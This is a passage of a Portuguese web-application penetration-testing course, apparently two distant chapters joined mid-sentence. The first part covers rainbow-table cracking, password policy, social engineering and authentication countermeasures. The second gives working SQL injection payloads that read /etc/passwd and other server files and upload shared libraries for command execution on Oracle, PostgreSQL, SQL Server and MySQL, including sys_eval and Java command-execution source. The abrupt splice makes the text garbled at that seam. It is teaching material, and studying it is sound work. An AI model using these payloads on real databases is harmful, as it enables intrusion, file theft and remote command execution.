1 RainbowCrack: um conjunto composto por trs softwares, que permitem gerar

rainbow tables, orden-las e utiliz-las no processo de quebra de arquivos de senhas.
So compatveis com plataformas Linux e Windows e podem aproveitar-se de
processadores grficos que empregam tecnologia CUDA, aumentando consideravel- CUDA
mente o desempenho do ataque. Compute Unified
Device Architecture
1 Ferramentas do projeto Free Rainbow Tables: so um conjunto de ferramentas uma arquitetura de
baseadas no RainbowCrack, mas que permitem o uso de tabelas indexadas e computao paralela,
criada pela Nvidia, capaz
hbridas, menores que as no formato original. Podem ser executadas nativamente em
de fornecer alto poder
sistemas Windows e Linux. de processamento,
1 Cryptohaze GPU Rainbow Cracker: permite gerar e utilizar rainbow tables, as quais utilizando os
processadores grficos
podem ser indexadas para um maior desempenho. Suporta plataformas Windows, que produzem.
Linux e Mac OS, em 64 bits, e requer a presena de um processador grfico com
suporte a CUDA.
O exemplo abaixo ilustra o uso do rcracki_mt, parte das ferramentas Free Rainbow Tables,
para encontrar a senha correspondente ao hash MD5, passado pela opo -h. Observe-se
que o processo todo durou pouco mais que trinta segundos e resultou na descoberta de
uma senha de seis letras minsculas seguidas de trs dgitos numricos. Antes disso, porm,
foram achadas 907 cadeias provveis, que conduziram a falsos alarmes. Para se ter ideia do
espao em disco necessrio, para a soluo desse cenrio foram empregadas tabelas que
totalizam cerca de 3 GBytes.
~$ rcracki_mt -h 2465d0454ec909560b45b72086604edf *.rti
Using 1 threads for pre-calculation and false alarm checking...
Found 4 rainbowtable files...
md5_hybrid(loweralpha#6-6,numeric#1-3)#0-0_0_10000x63130363_
distrrtgen[p][i]_0.rti:
reading index... 57605680 bytes read, disk access time: 0.87 s
reading table... 505042904 bytes read, disk access time: 7.22 s
verifying the file... ok
searching for 1 hash...
plaintext of 2465d0454ec909560b45b72086604edf is esrrnp240

cryptanalysis time: 3.05 s
statistics
-------------------------------------------------------
plaintext found: 1 of 1 (100.00%)
total disk access time: 8.10 s
116
total cryptanalysis time: 3.05 s
total pre-calculation time: 21.10 s
total chain walk step: 49985001
total false alarm: 907
total chain walk step due to false alarm: 7064898
result
-------------------------------------------------------
2465d0454ec909560b45b72086604edf esrrnp240
hex:657372726e70323430
Inexistncia de poltica de senhas forte

Ataques baseados em fora bruta, dicionrio e rainbow tables so executados mais q
facilmente, quando a aplicao no implementa uma poltica de senhas fortes, pois os
usurios costumam escolh-las de maneira revisvel.
Em testes caixa-cinza e caixa-branca, primeiramente, deve-se avaliar a qualidade da poltica

de senhas adotada e, somente depois, procurar por fraquezas na maneira como foi imple-
mentada. Para testes caixa-preta, a anlise de segurana deve se basear em diretrizes gerais
de senhas seguras, como as discutidas nesta seo, uma vez que a poltica no fornecida
como insumo de trabalho.
Vejamos a seguir os itens que devem constar em uma boa poltica de senhas, a razo de q
cada requisito e as tcnicas de teste que podem ser empregadas, para valid-la:
1 Comprimento mnimo.
1 Complexidade.
1 Troca peridica.
1 Histrico.
1 Mximo de trocas por dia.
1 Bloqueio de contas.
Comprimento mnimo Captulo 3 - Teste do mecanismo de autenticao
Influi diretamente na cardinalidade do espao de senhas e, logo, no nmero de senhas que

precisam ser testadas. Considerando o poder de processamento das placas grficas atuais,
o tamanho mnimo recomendado para senhas de contas de usurios comuns e adminis-
trativos de 8 e 14 posies, respectivamente. Esse requisito deve ser testado em telas de
cadastro de contas e alterao de senhas, com auxlio de um proxy de interceptao, para
verificar se o tamanho validado no lado do servidor.
Complexidade
Uma senha forte deve conter elementos de, pelo menos, trs dos seguintes grupos: letras
maisculas, letras minsculas, nmeros e caracteres especiais. Alm disso, no devem
ser utilizadas palavras de dicionrio, nmeros de documento, datas, nomes, nmeros de
telefone e nem variaes. Quando tudo isso adotado, ataques de dicionrio tornam-se
117
ineficazes, pois as senhas deixam de ser encontradas nas listas de palavras normalmente
empregadas. Para testar esse requisito, deve-se tentar fornecer senhas que no satisfaam
as regras estabelecidas, nas telas de cadastro de contas e alterao de senhas. Se a vali-
dao da complexidade for executada no lado cliente da aplicao, um proxy de intercep-
tao deve ser utilizado.
Troca peridica
O principal objetivo desse requisito reduzir o tempo em que uma conta comprometida
pode ser utilizada pelo atacante, nos casos em que o fato no percebido pelo usurio.
A frequncia com que a troca deve ocorrer, todavia, um ponto controverso, pois, se
for muito alta, pode favorecer o esquecimento da senha e criar um novo problema. Por
exemplo, se a cada 15 dias o usurio for obrigado a escolher uma nova senha, as chances de
ele escrev-la em algum lugar so grandes. Desse modo, na prtica, os padres e normas
de segurana adotam um prazo balanceado para troca, que varia de 60 a 90 dias. A melhor
maneira de testar esse item por meio de inspeo de cdigo, em um teste caixa-branca.
Histrico
Impedir que o usurio troque a senha, para qualquer uma das n ltimas que tenha utilizado,
visa evitar que credenciais comprometidas voltem a ser empregadas e que a senha atual seja
mantida, por meio de trocas imediatas. Para validar esse requisito, basta tentar alterar a senha
para um dos valores contidos no histrico e observar se o sistema probe ou no a operao.
Mximo de trocas por dia

Limitar o nmero de vezes que um usurio pode trocar a senha no mesmo dia visa atuar
em conjunto com o histrico, para que a senha atual no seja mantida, por meio de trocas
imediatas. Por exemplo, se o sistema mantm um histrico de vinte senhas e somente uma
alterao diria permitida, so necessrios vinte dias, para que se retorne senha original.
Sem a ltima restrio, porm, o mesmo resultado pode ser obtido quase que instantanea-
mente. O teste que deve ser realizado, nesse caso, consiste em trocar a senha vrias vezes
consecutivas, contabilizando o total permitido. Se esse for um nmero muito alto, pelo
exposto acima, conclui-se que a aplicao vulnervel.
Bloqueio de contas
Quando uma srie de tentativas malsucedidas de autenticao com a mesma conta for
detectada, ela deve ser imediatamente bloqueada, pois um ataque de fora bruta pode
estar sendo executado. Aps um tempo, que deve aumentar a cada ocorrncia, a conta deve
ser automaticamente destravada, para evitar ataques de negao de servio contra os usu-
rios da aplicao. Alternativamente, o desbloqueio pode ser realizado pelo administrador
do sistema, mediante solicitao formal do usurio. A validao desse controle consiste
na submisso consecutiva de senhas incorretas para uma dada conta e a observao do
comportamento da aplicao frente situao. Note, entretanto, que isso pode resultar em
perda de acesso e, por isso, no recomendvel em testes caixa-preta, salvo se for execu-
tado ao final do trabalho.
118
Negao de servio direcionada a usurios
Uma poltica inadequada de bloqueio de contas pode permitir ataques de negao de q
servio contra os usurios da aplicao. Em alguns casos, isso pode ter por objetivo favo-
recer o atacante, alm de causar incmodo vtima. Por exemplo, consideremos uma
aplicao de leilo eletrnico, que exibe os identificadores dos usurios participantes,
em ordem decrescente do lance efetuado. Alm disso, vamos supor que o sistema blo-
queia contas de usurio, aps trs tentativas invlidas de autenticao.
Se um usurio malicioso quiser aumentar as chances de obter um determinado item, ele

pode proceder da seguinte maneira (Stuttard e Pinto, 2007):
1. O usurio malicioso cria um programa para monitorar a pgina do item desejado.
2. Sempre que um usurio efetuar um lance, o programa trava a conta correspondente, por
meio de tentativas deliberadamente invlidas de autenticao, com o identificador do con-
corrente. Isso faz com que a vtima perca tempo, tentando desbloquear a conta que utiliza.
3. Prximo da hora de encerramento do leilo, o programa realiza um lance automtico, com

valor um centavo maior que o oferecido at ento, desde que no ultrapasse um limiar
pr-definido pelo atacante.
4. Se ningum conseguir efetuar um lance adicional, no pouco tempo restante, o ataque

bem-sucedido e o objeto, adquirido.
Observe que a grande vulnerabilidade desse cenrio que a aplicao revela a lista com- q
pleta de identificadores dos usurios que concorrem pelo mesmo item. Se o atacante
no tivesse essa informao, no seria capaz de bloquear os usurios necessrios.
Engenharia social
Mesmo hoje em dia, o maior problema de sistemas de autenticao de usurios no de q
origem tcnica, mas, sim, de natureza humana.
Por maior que seja a divulgao dos cuidados que devem ser tomados pelas pessoas no
mundo virtual, muitas delas ainda so vtimas de golpes enviados por correio eletrnico ou
disseminados por sites nada idneos. Todos os dias, dezenas de mensagens no solici-
tadas chegam s caixas de correio, com o objetivo de convencer o usurio a visitar alguma
pgina maliciosa ou abrir os anexos recebidos. Para isso, exploram a curiosidade e o medo,
caractersticos dos seres humanos, por meio de engenharia social. Por exemplo, fotos sobre
artistas, desastres naturais e escndalos sexuais sempre despertam a ateno das pessoas, Captulo 3 - Teste do mecanismo de autenticao
que tentam visualiz-las a qualquer custo, expondo-se a riscos desnecessrios. A Figura 3.23,
por sua vez, ilustra uma pgina falsificada de um banco, que supostamente perdeu a base
de usurios e requer, por isso, que recadastrem a cartela de chaves de segurana e a senha
do carto, sob pena de terem a conta bloqueada.
119
Algumas vezes, o contratante de um teste de invaso solicita que a postura de segurana q Figura 3.23
de seus colaboradores seja avaliada, como uma maneira de validar a eficcia da pol- Site falsificado,
para captura de
tica de segurana vigente. Nesse contexto, desde que se tenha autorizao por escrito, senha e cartela
tcnicas de engenharia social, como as implcitas nos cenrio acima, devem ser empre- de segurana.
gadas. Vejamos alguns testes que podem ser realizados:
1 Se no houver um processo formal para redefinio de senhas esquecidas, pode-se

ligar para a equipe de suporte, simulando a situao, como se fosse um usurio
vlido. Dependendo do treinamento em segurana do atendente, h uma boa chance
de ele fornecer uma senha, que permita conectar-se aplicao, pela porta principal.
1 Alternativamente, possvel ligar para um usurio, dizendo ser do suporte, e solicitar

que ele confirme a senha por telefone, devido a um problema ocorrido na base de
autenticao. Se a poltica de segurana for efetiva, o colaborador no informar
nada e avisar a equipe de resposta a incidentes.
1 A ltima abordagem consiste no envio ao usurio de um software malicioso que

capture as teclas digitadas ou que permita se conectar remotamente estao que
utiliza. Em qualquer dos casos, cedo ou tarde, as credenciais da vtima podero ser
obtidas. importante notar que, ao final do trabalho, o software esprio dever ser
removido do ambiente do cliente.
Vulnerabilidades em mecanismos de autenticao
Que tipos de vulnerabilidades podem ser encontrados em mecanismos de autenticao?
Contramedidas
Os seguintes controles devem ser considerados para evitar vulnerabilidades no meca- q
nismo de autenticao:
1 No permita identificadores de usurio repetidos na aplicao.

1 Remova, das reas acessveis pelo servidor web, arquivos que contenham credenciais
de acesso ao sistema e infraestrutura subjacente.
120
1 Remova, das pginas HTML e dos arquivos de cdigo-fonte, comentrios que conte- q
nham informaes de autenticao.
1 Desabilite contas pr-definidas da aplicao e das plataformas que a suportam, como

bancos de dados, servidores web, sistemas operacionais etc.
1 Implemente, na aplicao e nas plataformas subjacentes, polticas de senhas fortes

que considerem tamanho mnimo, complexidade, troca peridica, histrico, mximo
de trocas dirias e travamento de conta por tentativas malsucedidas de autenticao.
Nesse caso, o desbloqueio deve ocorrer, automaticamente, aps um perodo de
tempo pr-determinado, que deve aumentar a cada ocorrncia.
1 Para contas criadas automaticamente pela aplicao, atribua uma senha inicial alea-
tria e obrigue a troca no primeiro acesso.
1 Informe ao usurio, logo no incio de uma sesso, a data e hora da ltima vez em que
se conectou com sucesso.
1 Quando a autenticao falhar, exiba apenas uma mensagem de erro genrica. Nunca
informe se o identificador de usurio no existe ou se a senha incorreta. Adote
estratgia similar para mecanismos de recuperao de senha.
1 Em mecanismos de recuperao de senha, empregue perguntas secretas, cujas

respostas no sejam facilmente dedutveis ou encontradas na internet. Limite o
nmero de tentativas para acerto das questes, para evitar ataques de fora bruta.
Em caso de sucesso, envie uma mensagem automtica para o endereo de e-mail
pr-cadastrado, contendo um link para uma pgina efmera individualizada, na qual
a nova senha poder ser definida. Notifique a alterao ao usurio, por meio de nova
mensagem de correio eletrnico.
1 Se a aplicao possuir uma funcionalidade Lembrar Usurio, nunca memorize creden-

ciais completas, que o permitam conectar-se aplicao, sem fornecimento de senha.
1 Nunca confie em parmetros que podem ser alterados pelos usurios para decidir se
esto ou no autenticados.
1 Fornea a pgina de autenticao ao usurio somente por meio do protocolo HTTPS.

1 Sempre transmita credenciais de acesso por tneis protegidos criptograficamente.
1 Nunca submeta formulrios de autenticao por meio do mtodo GET. Igualmente,
no passe credenciais pela URL em processos de redirecionamento.
1 Configure o lado servidor dos tneis criptogrficos, de acordo com as melhores pr-
ticas de segurana conhecidas.
1 Se um erro inesperado ocorrer, a aplicao deve permanecer em um estado seguro.
1 Valide a entrada imediatamente antes de process-la, de modo que o formato espe-
rado seja respeitado.
1 No exiba mensagens de erro contendo informaes sobre as plataformas e tecnolo-

gias empregadas.
1 Exija sempre o fornecimento da senha atual para efetuar a troca de senha de um usurio.
1 Em mecanismos de autenticao baseados em mltiplos fatores, sempre verifique
que todas as etapas esperadas foram corretamente validadas. Toda informao rela-
cionada ao processo de autenticao deve ser mantida no servidor, exclusivamente.
121
1 Nunca armazene as senhas em claro. Em vez disso, adicione a elas 128 bits de salt q
e guarde apenas o hash criptogrfico do valor resultante, como validador de cada
conta. Para os casos em que o nmero de senhas muito pequeno, empregue cifras
probabilsticas, em vez de funes de hash criptogrficas, para evitar ataques de
varredura completa do domnio.
1 No exiba um identificador de usurio para outras pessoas que no ele prprio.

1 Implante uma poltica de segurana e conscientize todos os usurios.
1 Registre em trilhas de auditoria todas as tentativas vlidas e invlidas de autenticao,
incluindo o identificador de usurio, data, hora, aplicao e endereo de origem.
122
Atividade 1 Tecnologias de autenticao
Esta atividade tem por objetivo abordar tecnologias de autenticao empregadas em apli-
caes web, dando base para que o aluno realize as atividades de descoberta de vulnera-
bilidades e explorao. Para inici-la, carregue as mquinas virtuais do aluno e do servidor
(Fedora) e execute os roteiros na primeira delas.
Avaliao dos aspectos de autenticao

Acesse a pgina web de onde trabalhe e avalie os seguintes aspectos relacionados ao pro-
cesso de autenticao de usurios:
1 Qual o protocolo utilizado no carregamento da pgina de autenticao?

1 Que tipo de mecanismo de autenticao empregado?
1 Como o processo de recuperao de senhas?
1 A aplicao utiliza uma poltica de senhas fortes? Quais so os critrios adotados?
1 Como as senhas so protegidas durante o armazenamento?
1 As credenciais de acesso so enviadas por canal seguro?
1 Existe uma funcionalidade para lembrar o usurio?
Autenticao mtua de entidades em SSL/TLS

O propsito desta atividade ilustrar para o aluno como a identidade do usurio comprovada,
quando a opo de autenticao mtua de entidades dos protocolos SSL/TLS est habilitada.
2. Acesse https://mauth.esr.rnp.br/.
3. Na janela que aparece, escolha Wrong User e clique em Ok. Observe que uma pgina gen-
rica de erro foi exibida.
4. Pressione Ctrl + Shift- + Del para limpar o histrico do Firefox, selecione Everything e clique
em Clear Now.
5. Clique no cone de recarregar a pgina.
6. Na janela que aparece, escolha ESR User e clique em Ok. Veja que o usurio foi autenticado
com sucesso, porm, nenhuma senha foi fornecida.
7. Feche o navegador.
Atividade 2 Descoberta de vulnerabilidades e explorao

O propsito desta atividade introduzir ao aluno os mtodos que podem ser utilizados para
a descoberta e explorao de vulnerabilidades, em mecanismos de autenticao. Todos os
exerccios devem ser realizados na mquina virtual do aluno e altamente recomendado
que se tente traar a estratgia de explorao antes de seguir o roteiro fornecido.
123
Uso de informaes obtidas nas fases de reconhecimento e mapeamento
Neste exerccio, informaes encontradas nas etapas de reconhecimento e mapeamento
so utilizadas para se obter acesso ao sistema.
Parte I Arquivos contendo credenciais de acesso
2. Visualize o contedo do arquivo robots.txt, da aplicao Mutillidae:
~$ curl http://mutillidae.esr.rnp.br/robots.txt
Observe que h um diretrio /passwords e um arquivo config.inc.
5. Acesse http://mutillidae.esr.rnp.br/passwords.
6. Visualize o contedo do arquivo accounts.txt.
7. Anote as senhas dos usurios admin e john.
8. Acesse http://mutillidae.esr.rnp.br.
9. Clique em Login.
10. Tente se conectar como o usurio admin e veja a mensagem no topo da tela.
11. Clique novamente em Login e repita o passo anterior, para o usurio ed.
Parte II Pistas no cdigo
12. Clique no marcador WebGoat e fornea guest e guest, quando usurio e senha
forem solicitados.
14. No menu, ao lado esquerdo, clique em Code Quality e, depois, em Discover Clues in the HTML.
15. Visualize o cdigo-fonte da pgina, pressionando Ctrl + U.
16. Pressione Ctrl + F, para realizar uma busca, e digite , 8
0,1,0) from dual--
O pacote vulnervel DBMS_EXPORT_EXTENSION pertence ao usurio SYS do Oracle e, assim, a

funo criada como sendo dele. Consequentemente, para que o usurio da aplicao possa
invoc-la, deve-se executar um GRANT, concedendo a ele privilgio de execuo da funo:
266
EXECUTE IMMEDIATE GRANT EXECUTE ON FREAD TO SYSTEM 8
;END;;END;--, 8
0,1,0) from dual--
Feito tudo isso, fica fcil ler arquivos do servidor de banco de dados, como se v no prximo
exemplo, que extrai o arquivo /etc/passwd:
and 1=2 union select 1,sys.fread(/etc,passwd),null from dual--
O processo de escrita de arquivos segue curso similar, sendo apenas necessrio abrir o
arquivo em modo de escrita (W) e utilizar o comando PUT ou derivados.
PostgreSQL
O comando COPY pode ser utilizado, em PostgreSQL, para leitura e escrita de arquivos q
binrios, em formato prprio do SGBD e textuais. O acesso ao sistema de arquivos est
restrito aos privilgios da conta de sistema operacional que executa o SGBD, e no h
restrio quanto sobrescrita de arquivos, diferentemente de como ocorre em MySQL.
Um ponto importante a ser observado que toda transferncia efetuada sempre entre
arquivos e tabelas do banco de dados.
Consequentemente, o primeiro passo para a leitura de um arquivo consiste na escolha da tabela

que receber os dados ou na criao de uma tabela temporria, como no exemplo abaixo:
; create table tmp (num serial, data text)--
Em seguida, deve-se carregar o arquivo desejado na tabela alvo:
; copy tmp (data) from /var/lib/pgsql/data/pg_hba.conf--
Finalmente, os dados podem ser extrados por meio da tcnica baseada em UNION:
and 1=2 union select num,data,null from tmp order by 1--
A escrita de arquivos, por sua vez, direta, bastando especificar uma tabela ou utilizar um
SELECT como fonte de dados:
; copy books to /tmp/out.txt csv--
No vetor acima, a clusula CSV faz com que os campos das linhas da tabela books sejam
separados por vrgula quando gravados no arquivo /tmp/out.txt.
Observe agora como se armazenam dados a partir de uma consulta:
; copy (select version()) to /tmp/out.txt--
q
Todas essas tcnicas apresentam uma limitao, apontada pelo prprio Leidecker
(2007), que se resume na impossibilidade de manipular arquivos binrios com formato
arbitrrio. Uma soluo para esse problema foi introduzida por Guimares (2009) e se
baseia nas funcionalidades de manipulao de objetos grandes.
Embora esse novo mtodo represente um grande avano em relao aos anteriores, o tama-
nho mximo de arquivo que pode ser copiado para o servidor de apenas 8192 bytes.
267
De acordo com o roteiro descrito por Guimares (2009), a etapa inicial consiste na codifica-
o em BASE64 do arquivo a ser copiado. Considere, por exemplo, que este se chame lib.so:
~$ base64 lib.so > out.b64
Em seguida, uma tabela auxiliar deve ser criada, contendo um campo do tipo text:
; create table tmp (data text)--
O arquivo em BASE64 deve, ento, ser inserido na tabela de suporte:
; insert into tmp values ( 8
f0VMRgEBAQAAAAAAAAAAAAMAAwABAAAAcAgAADQAAAAUEAAAAAAAADQAIAAFACgAGQ 8
AYAAEAAAAAAAAAAAAAAAAAAAAYDgAAGA4AAAUAAAAAEAAAAQAAABgOAAAYHgAAGB4AA 8
AABAAAIAQAABgAAAAAQAAACAAAAMA4AADAeAAAwHgAAyAAAAMgAAAAGAAAABAAAAAQA 8
...
MEAAAAIAAAAAwAAABgfAAAYDwAACAAAAAAAAAAAAAAABAAAAAAAAADGAAAAAQAAADAA 8
AAAAAAAAGA8AACwAAAAAAAAAAAAAAAEAAAABAAAAAQAAAAMAAAAAAAAAAAAAAEQPAAD
8
PAAAAAAAAAAAAAAABAAAAAAAAAA==)--
Prossegue-se criando um objeto do tipo large, identificado por um nmero arbitrrio:
; select lo_create(1000)--
Agora, o objeto deve ter a parte de dados atualizada, com os bytes originais do arquivo
sendo copiados para o servidor. Isso feito manipulando a linha da tabela pg_largeobject,
cujo loid seja igual ao identificador escolhido no passo anterior:
; update pg_largeobject set data = (select decode(data,base64) 8
from tmp) where loid=1000--
Por fim, o arquivo pode ser criado no servidor por meio da funo lo_export():
; select lo_export(1000,/tmp/lib.so)--
SQL Server UNC
q
Universal Naming
A leitura de arquivos em SQL Server realizada de maneira similar suportada pelo SGBD Convention. Define
o formato de nomes,
PostgreSQL, mas o comando BULK INSERT utilizado no lugar. A transferncia tambm
para acesso a recursos
depende de uma tabela, e a fonte de dados pode ser local ao prprio servidor ou remota, disponibilizados em
especificada por um UNC, no formato \\servidor\compartilhamento\caminho\arquivo. uma rede local.
Diversas opes so fornecidas pelo comando por meio da clusula WITH para descrever o
formato do arquivo de entrada, e, se nenhum deles for empregado, os valores padronizados
so assumidos. Exemplos de opes incluem delimitadores de campos e de fim de linha.
Assim como em PostgreSQL, o primeiro passo a criao de uma tabela temporria:
268
; create table tmp (data varchar(8000))--
A etapa seguinte consiste no carregamento do contedo do arquivo, por exemplo, iis6.log,

na tabela recm-criada:
; bulk insert tmp from c:\windows\iis6.log--
Por fim, os dados so extrados por meio da tcnica UNION:
and 1=2 union all select null,data,null from tmp--
O SQL Server no possui uma contraparte do BULK INSERT diretamente como um q

comando, sendo necessrio empregar um utilitrio externo, chamado de bcp. Esse
aplicativo permite importar e exportar dados de um banco SQL Server e chamado via
linha de comando.
Assim, para invoc-lo de dentro do SGBD, deve-se utilizar o procedimento estendido xp_
cmdshell, que permite executar programas arbitrrios. Como esse o tema de uma seo
adiante, por ora, vejamos apenas exemplos de uso a partir do sistema operacional:
C:\> bcp select * from master..secret_table queryout 8
c:\temp\tst.txt -c -Usa -P
Starting copy...
3 rows copied.
Network packet size (bytes): 4096
Clock Time (ms.): total 1
C:\> type c:\temp\tst.txt
Secret text 100000.0000
Not so secret text 300.0000
Top secret text 100000000.0000
No caso acima, a fonte de dados um comando SELECT, que deve sempre ser acompanhado
da opo queryout. O arquivo de destino especificado em seguida juntamente com a
opo -c, que indica que os dados devem ser tratados como caracteres. Finalmente, as cre-
denciais devem ser informadas pelas opes -U e -P.
Quando todas as linhas da tabela so exportadas, sem exceo, mais fcil utilizar a
segunda sintaxe, abaixo mostrada:
C:\> bcp master..secret_table out c:\temp\tst2.txt -c -Usa -P
Starting copy...
269
3 rows copied.
Network packet size (bytes): 4096
Clock Time (ms.): total 1
A diferena desse formato que a tabela especificada diretamente, como argumento do

comando, e a opo out deve ser empregada, em vez de queryout.
Funo definida pelo usurio

As funcionalidades originais de um sistema gerenciador de bancos de dados podem ser q
estendidas, por meio de funes definidas pelo usurio (UDF, do ingls User Defined Func- UDF
tion), as quais podem ser chamadas como parte de uma expresso, em um comando SQL. No contexto de bancos
de dados SQL, uma
De modo geral, o comando CREATE FUNCTION empregado para a criao dessas exten- funo definida pelo
ses, que podem ser escritas em diversas linguagens de programao, dependendo do usurio, que estende as
funcionalidades nativas
SGBD alvo. Em alguns casos, possvel cri-las, tambm, a partir de bibliotecas compartilha- de um SGBD e que
das presentes no sistema de arquivos (Guimares, 2009). pode ser usada como
uma expresso.
MySQL
MySQL permite a criao de funes de usurio, implementadas em linguagem C e q
compiladas como bibliotecas dinmicas, que devem ser armazenadas, a partir da verso
5.1.19, no diretrio indicado pelo parmetro plugin_dir, definido no arquivo my.cnf. Nas
verses anteriores, era possvel coloc-las em qualquer pasta que fosse pesquisada pelo
sistema operacional em busca de bibliotecas compartilhadas. Uma dificuldade que se
tem hoje em dia, para a criao de tais funes via injeo de SQL, que o diretrio que
deve hospedar a biblioteca, normalmente, no pode ser escrito pela conta do MySQL.
Alm disso, para injetar o comando CREATE FUNCTION, a aplicao e a verso do SGBD
devem suportar comandos empilhados.
O exemplo dado a seguir, distribudo como software livre, por meio de licena GPL Lesser
General Public License, obra de Bernardo Damele Guimares, criador do sqlmap, e de
Roland Bouman. O cdigo deles, apresentado parcialmente na Figura 6.41, estende a biblio-
teca lib_mysqludf_sys, parte do repositrio do MySQL, e adiciona ao todo seis funes,
incluindo sys_exec() e sys_eval(), para execuo de comandos do sistema operacional.
A biblioteca pode ser compilada para ambientes Windows e Linux, tendo em mente que os
cabealhos e bibliotecas do MySQL precisam estar instalados.
270
...
char* sys_eval(
UDF_INIT *initid
, UDF_ARGS *args
, char* result
, unsigned long* length
, char *is_null
, char *error
){
FILE *pipe;
char *line;
unsigned long outlen, linelen;
line = (char *)malloc(1024);
result = (char *)malloc(1);
outlen = 0;
result[0] = (char)0;
pipe = popen(args->args[0], r);
while (fgets(line, sizeof(line), pipe) != NULL) {
linelen = strlen(line);
result = (char *)realloc(result, outlen + linelen);
strncpy(result + outlen, line, linelen);
outlen = outlen + linelen;
}
Figura 6.41
Cdigo-fonte da
funo sys_eval(), pclose(pipe);
que estende a
funcionalidade do
MySQL, permitin-
do execuo de if (!(*result) || result == NULL) {
programas de linha
de comando. *is_null = 1;
271
} else {
result[outlen-1] = 0x00;
*length = strlen(result);
return result;
...
A gerao do binrio pode ser feita por meio do seguinte comando:
~$ gcc -Wall -I/usr/include/mysql -Os -shared lib_mysqludf_sys.c 8
-o lib_mysqludf_sys.so
Em seguida, o comando strip deve ser executado para a remoo dos smbolos e conse-
quente reduo do tamanho da biblioteca. O objetivo facilitar o envio para o servidor de
banco de dados, por meio da injeo de SQL (Guimares, 2009).
~$ strip -sx lib_mysqludf_sys.so
A prxima etapa determinar o diretrio em que a biblioteca deve ser gravada no servidor
de banco de dados. Supondo que a verso instalada de MySQL seja a 5.1.56, como j vimos,
isso definido pelo valor do parmetro de inicializao plugin_dir. Este pode ser obtido a
partir do dicionrio de dados, por meio da seguinte injeo de SQL:
and 1=2 union select 1,null,variable_value,null,null,null from 8
information_schema.global_variables where variable_name=PLUGIN_

DIR#
Que resulta no valor /usr/lib/mysql/plugin. Por padro, esse diretrio no pode ser escrito
por todos os usurios e, assim, para o ataque funcionar, necessrio escalar os privilgios
da conta de sistema operacional utilizada pelo MySQL. Para a realizao dessa prova de con-
ceito, entretanto, os privilgios necessrios foram diretamente concedidos conta mysql.
A gravao do arquivo no servidor emprega o comando SELECT ... INTO DUMPFILE, visto
anteriormente. Observe que, por se tratar de um arquivo binrio, a biblioteca deve ser
codificada como uma cadeia de valores hexadecimais antes de ser transferida. Isso pode ser
realizado, facilmente, com auxlio dos utilitrios xxd e tr, para Linux. Enquanto o primeiro
cuida do processo de codificao, o ltimo remove os caracteres de fim de linha, gerados
pelo programa xxd:
~$ xxd -p lib_mysqludf_sys.so | tr -d \n > out.hex
272
Em seguida, a partir do arquivo gerado, out.hex, deve-se construir o vetor de injeo:
and 1=2 union select ,, 8
0x7f454c4601010100000000000000000003000300010000007008000034000000141 8
000000000000034002000050028001900180001000000000000000000000000000000 8
180e0000180e0000050000000010000001000000180e0000181e0000181e000000010 8
00008010000060000000010000002000000300e0000301e0000301e0000c8000000c8 8
...
00f80e00000c00000000000000000000000400000004000000b800000001000000030 8
00000041f0000040f00001400000000000000000000000400000004000000c1000000 8
0800000003000000181f0000180f00000800000000000000000000000400000000000 8
000c6000000010000003000000000000000180f00002c000000000000000000000001 8
0000000100000001000000030000000000000000000000440f0000cf0000000000000 8
,,, into dumpfile /usr/lib/mysql/plugin/lib_mysqludf_sys.so#
Para finalizar o processo, basta criar as funes no MySQL, referenciando a biblioteca

recm-copiada para o servidor:
; 8
CREATE FUNCTION lib_mysqludf_sys_info RETURNS string SONAME 8
lib_mysqludf_sys.so; 8
CREATE FUNCTION sys_get RETURNS string SONAME lib_mysqludf_sys.so; 8
CREATE FUNCTION sys_set RETURNS int SONAME lib_mysqludf_sys.so; 8
CREATE FUNCTION sys_exec RETURNS int SONAME lib_mysqludf_sys.so; 8
CREATE FUNCTION sys_eval RETURNS string SONAME lib_mysqludf_sys.so 8 ;
CREATE FUNCTION sys_bineval RETURNS int SONAME lib_mysqludf_sys.

so#
Percebe-se que esse passo requer o suporte a comandos empilhados, o que no to fcil
de encontrar nos sistemas em produo baseados em MySQL.
Finalizando, o exemplo abaixo ilustra a execuo do comando ping contra a mquina com
endereo IP 192.168.213.10, por meio de uma chamada a sys_eval(), via injeo de SQL:
union select 1,null,sys_eval(ping -c 4 192.168.213.10),null, 8
null,null#
273
Oracle
Em Oracle, possvel criar funes definidas por usurio nas linguagens PL/SQL e Java, q
sendo um exemplo da primeira a rotina que vimos para a leitura de arquivos. Nessa
seo, para cobrir todas as possibilidades, uma funo em Java que executa comandos
no sistema operacional apresentada na Figura 6.42. Assim como no caso anterior,
necessrio injetar todo o cdigo explorando uma rotina vulnervel, escrita em PL/SQL,
sem a qual o ataque no funciona.
CREATE OR REPLACE AND RESOLVE JAVA SOURCE NAMED JCMD AS
import java.lang.*;
import java.io.*;
public class JCMD {
public static String execCmd(String command) throws IOException

{
String line = ;
StringBuffer sb = new StringBuffer();
Process p = Runtime.getRuntime().exec(command);
DataInputStream dis = new DataInputStream(p.getInputStream());
while ((line = dis.readLine()) != null) {
sb.append(line + \n);
dis.close();
return sb.toString();
Figura 6.42
} Cdigo-fonte Java
de funo para exe-
} cuo de comandos
em Oracle.
A criao da classe Java JCMD representa apenas parte da tarefa, restando, ainda, a criao
da funo propriamente dita e a concesso de privilgios aos usurios. Os comandos que

realizam essas aes esto ilustrados a seguir:
CREATE OR REPLACE FUNCTION JCMDF (command IN VARCHAR2)
RETURN VARCHAR2
AS LANGUAGE JAVA
NAME JCMD.execCmd(java.lang.String) return java.lang.String;
274
GRANT EXECUTE ON JCMDF TO PUBLIC;
Feito tudo isso, j possvel executar comandos no sistema operacional:
and 1=2 union select null,replace(sys.jcmdf(/bin/ls -l /), 8
chr(10),<BR>),null from dual--
A funo REPLACE utilizada acima para incluir as quebras de linha no HTML gerado, e o
resultado da injeo est ilustrado na Figura 6.43.

q
Execuo
do comando ls -l /, O SGBD PostgreSQL permite a criao de funes de usurio, implementadas em lin-
por meio de guagem C e compiladas como bibliotecas dinmicas, que podem ser armazenadas em
chamada a UDF.
qualquer diretrio que a conta do servidor consiga acessar. Isso facilita muito a tarefa
de injeo, pois o arquivo pode ser gravado no diretrio /tmp, por exemplo, que pode
ser escrito por todos os usurios do sistema. Adicionalmente, a explorao favorecida
mais ainda pelo suporte nativo a comandos empilhados.
Nas verses anteriores a 8.1, inclusive, era possvel definir funes que utilizavam bibliote-
cas nativas do sistema operacional, como a libc. A partir da verso 8.2, isso no mais poss-
vel, pois um bloco mgico deve estar presente em todas as bibliotecas compartilhadas para
que possam ser carregadas (Leidecker, 2007; Guimares, 2009). Portanto, esse requisito
deve ser devidamente atendido para que o ataque funcione corretamente.
